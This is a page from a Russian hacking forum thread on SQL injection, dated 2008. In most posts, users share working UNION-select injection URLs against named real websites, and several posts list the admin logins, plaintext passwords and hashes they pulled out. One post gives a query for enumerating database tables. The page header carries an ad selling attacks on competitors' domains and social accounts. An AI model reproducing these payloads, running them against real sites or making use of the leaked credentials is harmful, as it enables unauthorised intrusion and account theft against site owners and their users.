Форум АНТИЧАТ - SQL Инъекции

ANTICHAT.XYZ

VIDEO.ANTICHAT.XYZ

НОВЫЕ СООБЩЕНИЯ

ФОРУМ

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 630 из 1239

630

Опции темы

Поиск в этой теме

Опции просмотра

21.08.2008, 22:15

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Отправить сообщение для Cennarios с помощью ICQ

http://msracing.co.uk/category.php?c_id=1)+union+select+1,2,concat(0x3a3 a,u_username,0x3a3a,u_password),4+from+users/*

http://msracing.co.uk/admin/

login:msrcng06 pass:msrcng2006

21.08.2008, 23:57

SVAROG

Постоянный

Регистрация: 13.02.2007

Сообщений: 406

Провел на форуме:
2706059

Репутация: 206

http://www.breitbart.com/print.php?id=D8QRMCU00%27+union+select+1,2,3,4,5,6 ,7,8,9,0,version(),2/*
4.1.20-log

22.08.2008, 00:38

Elephant

Новичок

Регистрация: 31.07.2008

Сообщений: 11

Провел на форуме:
39796

Репутация: -3

Отправить сообщение для Elephant с помощью ICQ

Отправить сообщение для Elephant с помощью MSN

Отправить сообщение для Elephant с помощью Yahoo

Заметьте, проект САМЫЙ крупный который посвящён серии GTA

http://gta.com.ua/file_sa_details.phtml?id=59'

22.08.2008, 00:57

4p3

Участник форума

Регистрация: 18.08.2008

Сообщений: 159

Провел на форуме:
750247

Репутация: 92

Отправить сообщение для 4p3 с помощью ICQ

Цитата:

Сообщение от Elephant

Заметьте, проект САМЫЙ крупный который посвящён серии GTA

http://gta.com.ua/file_sa_details.phtml?id=59'

Раскрутил бы до конца что ли...

http://gta.com.ua/file_sa_details.phtml?id=999+union+select+1,2,3,co ncat_ws(0x3a3a,username,password),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20+from+admin/*

Версия: 4.
Login:admin
Password hash:2IsfJILPkOJ2 (DES??)

http://gta.com.ua/admin -> Access Denied, потому никакого смысла нема. Разве что на форуме стоит ipb 2. Можно из for_members_converge вытянуть соль и хэшик.

24.08.2008, 17:42

Elephant

Новичок

Регистрация: 31.07.2008

Сообщений: 11

Провел на форуме:
39796

Репутация: -3

Цитата:

Сообщение от 4p3

Ракрутил с помощью ачатовца)))
А из форума ничё не выудил, а админка стоит огронечитель по IP, обидно блин! хотя взломать то можно, только сплоита под версию того форума я не нашел((((

23.08.2008, 09:49

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

Провел на форуме:
5076186

Репутация: 778

Цитата:

Сообщение от softrix

А какой запрос для просмотра баз данных, если не секрет?

-1+union+select+111,222,333,table_schema,555,666+fr om+information_schema.tables+where+table_name=0x75 73657273

22.08.2008, 15:32

nicusor

Участник форума

Регистрация: 19.03.2008

Сообщений: 108

Провел на форуме:
1357043

Репутация: 137

http://www.fbmbmx.com/news.php?newsid=1296+and+1=2+union+select+1,concat _ws(0x3a,user(),version(),database()),3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

user() = fbmbmx@localhost
version() = 4.1.21-log
database() = fbmbmx

admins
name:password

mike:erb9768
john:lee7124
steve:crandall4776
tom:blyth24
mikefixed:erb9768

Последний раз редактировалось nicusor; 22.08.2008 в 15:48..

22.08.2008, 23:46

DTW

Участник форума

Регистрация: 11.05.2008

Сообщений: 202

Провел на форуме:
420713

Репутация: 104

Цитата:

http://www.planeta-lv.com/index_flash.php?page=1&sub=1'+union+select+1,2,3,4 ,5,6,7,8,TABLE_NAME,0,1,2,3+FROM+INFORMATION_SCHEM A.TABLES/*

планета

23.08.2008, 01:02

softrix

Новичок

Регистрация: 05.07.2008

Сообщений: 16

Провел на форуме:
64853

Репутация: 7

Вот инъект на порносайте, интересно конечно в админку было бы влезть, но соленый хэш

И не известно как соленый, да еще соль похоже хэшированая, а где чистая соль лежит не нашел еще !

http://novoporn.com/index.php?action=image&id=-16323+union+select+1,concat(id,char(58,58,58),logi nname,char(58,58,58),password,char(58,58,58),salt, char(58,58,58),title,char(58,58,58),firstname,char (58,58,58),lastname,char(58,58,58),email,char(58,5 8,58),inactive),3+from+cfw_auth_login

name::

ass:::salt
admin:::32d22edc834dbe06bef10ffb7cb148e1:::b7f4cf8 29896e1ccbfbc63c934077c6c

#10

23.08.2008, 05:04

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Китайский банннер-эксчендж
login:mintruder pass:django1'

http://www.banner4banner.ch/view.php?e=1&t=_blank&c=i&b=-1+union+select+1,2,concat(username,0x3a3a,password ),4,5,6,7,8,9,10,11,12,13,14+from+user+limit+0,20/*

в 0 лимите лежит админ, но не брутится сволота... =)

Страница 630 из 1239

630

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ